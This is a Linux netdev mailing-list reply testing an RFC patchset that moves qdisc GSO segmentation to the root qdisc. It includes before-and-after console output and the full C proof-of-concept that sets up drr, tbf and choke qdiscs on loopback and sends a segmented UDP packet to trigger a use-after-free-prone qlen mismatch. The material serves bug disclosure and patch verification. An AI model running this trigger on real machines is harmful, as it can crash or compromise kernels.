Re: [RFC Patch net-next 0/2] net_sched: Move GSO segmentation to root qdisc

[Mingi Cho <mgcho.minic@gmail.com>]

On Tue, Jul 01, 2025 at 04:29:13PM -0700, Cong Wang wrote:
> This patchset attempts to move the GSO segmentation in Qdisc layer from
> child qdisc up to root qdisc. It fixes the complex handling of GSO
> segmentation logic and unifies the code in a generic way. The end result
> is cleaner (see the patch stat) and hopefully keeps the original logic
> of handling GSO.
> 
> This is an architectural change, hence I am sending it as an RFC. Please
> check each patch description for more details. Also note that although
> this patchset alone could fix the UAF reported by Mingi, the original
> UAF can also be fixed by Lion's patch [1], so this patchset is just an
> improvement for handling GSO segmentation.
> 
> TODO: Add some selftests.
> 
> 1. https://lore.kernel.org/netdev/d912cbd7-193b-4269-9857-525bee8bbb6a@gmail.com/
> 
> ---
> Cong Wang (2):
>   net_sched: Move GSO segmentation to root qdisc
>   net_sched: Propagate per-qdisc max_segment_size for GSO segmentation
> 
>  include/net/sch_generic.h |  4 +-
>  net/core/dev.c            | 52 +++++++++++++++++++---
>  net/sched/sch_api.c       | 14 ++++++
>  net/sched/sch_cake.c      | 93 +++++++++++++--------------------------
>  net/sched/sch_netem.c     | 32 +-------------
>  net/sched/sch_taprio.c    | 76 +++++++-------------------------
>  net/sched/sch_tbf.c       | 59 +++++--------------------
>  7 files changed, 123 insertions(+), 207 deletions(-)
> 
> -- 
> 2.34.1
> 

Hi Cong,

I tested the proposed patch and found that the reported bug was fixed. A qlen mismatch between Qdiscs can potentially cause UAF, so I believe this patch needs to be applied.

When executing the PoC on the latest kernel without the patch applied, a warning message occurs in drr_dequeue() as shown below.

Before applying the patch:

root@test:~# ./poc
qdisc drr 1: dev lo root refcnt 2
qdisc tbf 2: dev lo parent 1:1 rate 1Mbit burst 1514b lat 50.0ms
qdisc choke 3: dev lo parent 2:1 limit 2p min 1p max 2p
[    7.588847] drr_dequeue: tbf qdisc 2: is non-work-conserving?

Testing after applying the patch to the v6.17 kernel shows that the warning message has disappeared.

After applying the patch:

root@test:~# ./poc
qdisc drr 1: dev lo root refcnt 2
qdisc tbf 2: dev lo parent 1:1 rate 1Mbit burst 1514b lat 50.0ms
qdisc choke 3: dev lo parent 2:1 limit 2p min 1p max 2p

I tested the patch and found that the bug was resolved, but I'm not sure if any other side effects occur.

The PoC used for testing is as follows.

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <linux/udp.h>

#ifndef SOL_UDP
#define SOL_UDP 17 // UDP protocol value for setsockopt
#endif

void loopback_send (uint64_t size) {
    struct sockaddr iaddr = { AF_INET };
    char data[0x1000] = {0,};

    int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0);

    int gso_size = 1300;

    setsockopt(inet_sock_fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size));

    connect(inet_sock_fd, &iaddr, sizeof(iaddr));

    write(inet_sock_fd, data, size);

    close(inet_sock_fd);
}

int main(int argc, char **argv) {
    system("ip link set dev lo up");
    system("ip link set dev lo mtu 1500");

    system("tc qdisc add dev lo root handle 1: drr");
    system("tc filter add dev lo parent 1: basic classid 1:1");
    system("tc class add dev lo parent 1: classid 1:1 drr");
    system("tc class add dev lo parent 1: classid 1:2 drr");

    system("tc qdisc add dev lo parent 1:1 handle 2: tbf rate 1Mbit
burst 1514 latency 50ms");

    system("tc qdisc add dev lo parent 2:1 handle 3: choke limit 2
bandwidth 1kbit min 1 max 2 burst 1");

    system("tc qdisc show");

    loopback_send(4000);

    system("tc class del dev lo classid 1:1");

    system("timeout 0.1 ping -c 1 -W0.01 localhost > /dev/null");
}

Thanks,
Mingi